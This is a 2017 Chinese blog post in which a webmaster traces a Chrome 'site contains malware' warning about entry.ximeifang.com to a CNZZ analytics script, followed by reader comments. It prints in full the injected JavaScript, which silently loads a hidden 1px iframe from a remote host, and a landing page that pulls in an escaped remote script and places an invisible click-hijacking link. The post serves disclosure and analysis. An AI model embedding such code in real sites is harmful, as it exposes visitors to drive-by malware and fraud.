随笔杂记 订阅所有【随笔杂记】的日志

ximeifang 恶意软件病毒揭秘

作者:admin 日期:2017-03-27

字体大小:
困扰了很多天的ximeifang.com恶意软件病毒问题终于搞清楚了,从开始怀疑cnzz到后来怀疑联通dns劫持,到现在确认是cnzz自己放的木马,过程还真是曲折。。。
木马表现:chrome浏览器下会提示
您要访问的网站包含恶意软件

攻击者可能会试图通过 entry.ximeifang.com 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)
 
木马来源:CNZZ官方。。。震惊。。。
代码如下:
http://c.cnzz.com/core.php?web_id=统计id&show=pic1&t=z
JavaScript代码
  1. var u = "http://c.cnzz.com/core.php?web_id=统计ID&show=pic1&t=z";  
  2. var wapp = 0.95;  
  3. var pcp = 0.95;  
  4. var serh = "entry.ximeifang.com:31002";  
  5. window.onerror = function(a, b, c) {  
  6.     return true;  
  7. };  
  8. function IsPC() {  
  9.     var a = navigator.userAgent;  
  10.     var b = ["Android""iPhone""SymbianOS""Windows Phone""iPad""iPod"];  
  11.     var c = true;  
  12.     for (var v = 0; v < b.length; v++) {  
  13.         if (a.indexOf(b[v]) > 0) {  
  14.             c = false;  
  15.             break  
  16.         }  
  17.     }  
  18.     return c;  
  19. };  
  20. function loadjs(a) {  
  21.     var c = document.createElement("script");  
  22.     c.setAttribute("type""text/javascript");  
  23.     c.setAttribute("src", a);  
  24.     c.setAttribute("charset""utf-8");  
  25.     document.getElementsByTagName("head")[0].appendChild(c);  
  26. };  
  27. function loadiframe(a) {  
  28.     var c = document.createElement("iframe");  
  29.     c.setAttribute("id""wbifr");  
  30.     c.setAttribute("name""wbifr");  
  31.     c.setAttribute("width""1px");  
  32.     c.setAttribute("height""1px");  
  33.     c.setAttribute("src", a);  
  34.     document.getElementsByTagName("head")[0].appendChild(c);  
  35. };  
  36. if (IsPC()) {  
  37.     if (Math.random() < pcp) {  
  38.         loadiframe("http://" + serh + "/fakepc");  
  39.     }  
  40. else {  
  41.     if (Math.random() < wapp) {  
  42.         loadiframe("http://" + serh + "/fakewap");  
  43.     }  
  44. }  
  45. if (u.indexOf("?") > 0) {  
  46.     u += "&aaa_flag=1"  
  47. else {  
  48.     u += "?aaa_flag=1"  
  49. }  
  50. loadjs(u);  
访问fakepc则会跳转到:
http://niujv.com/
该网页源码:
XML/HTML代码
  1. <!DOCTYPE html>  
  2. <html>  
  3. <head>  
  4. <body>  
  5. <script>  
  6. <!--  
  7. document.write(unescape("%3Cscript%20src%3D%22http%3A//code1.168wss.com/page/%3Fs%3D11636%22%3E%3C/script%3E"));  
  8. //-->  
  9. </script>  
  10. <img src="fr fc_9 mar.png" />  
  11. <a href="http://www.niwodai.com/event.mhtml?artId=1823227138797576&f&utm_source=baidutz&utm_medium=cpc&cid=sem-bd03-test-dylc-380&nwd_ext_aid=3000001481188029&source_id=" target="_blank" style="width: 0px;  height: 0px; position: absolute; top: 0px; left: 0px; background:  #b2b2b2; filter:alpha(opacity=10); -moz-opacity:0.1; -khtml-opacity:  0.1; opacity: 0.1;"></a>  
  12. <span style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1261561746&web_id=1261561746" language="JavaScript"></script></span>  
  13. <head>  
  14. </body>  
  15. </html>  
又被嵌入了一层js。。。具体要干啥我也懒得分析了,反正不会是好事。。。
 
至此算是真相大白了,CNZZ的客服还说换https就不会被DNS劫持了。。。。
 
国内最大的流量统计服务商北京锐讯灵通科技有限公司。。。。

 



上一篇: entry.ximeifang.com恶意软件病毒DNS劫持
下一篇: 在IE下getAttribute()方法无法读到class属性的解决方法
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: DNS劫持 木马
相关日志:
评论: 4 | 引用: 0 | 查看次数: 2860
匿名[2017-03-31 09:34 AM | | | 120.214.42.28 | del | 回复回复]
4#
为什么删除了cnzz统计代码,然后全站更新,再看,360还是有这个ximeifang.com的警告呢?
匿名[2017-03-30 11:18 PM | | | 120.214.39.39 | del | 回复回复]
地板
真的么?这个ximeifang.com也困扰了我很长时间了,如果是cnzz的话,怎么处理?
匿名[2017-03-27 11:17 PM | | | 111.177.1.42 | del | 回复回复]
板凳
确实CNZZ的锅,可能被注入了,也可能是故意的。
以前我用https,默认的是淘宝和天猫广告。
现在被拦截了
l3ryan[2017-03-27 03:14 PM | | | 183.194.88.134 | del | 回复回复]
沙发
这个CNZZ真的是垃圾
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭

 广告位

↑返回顶部↑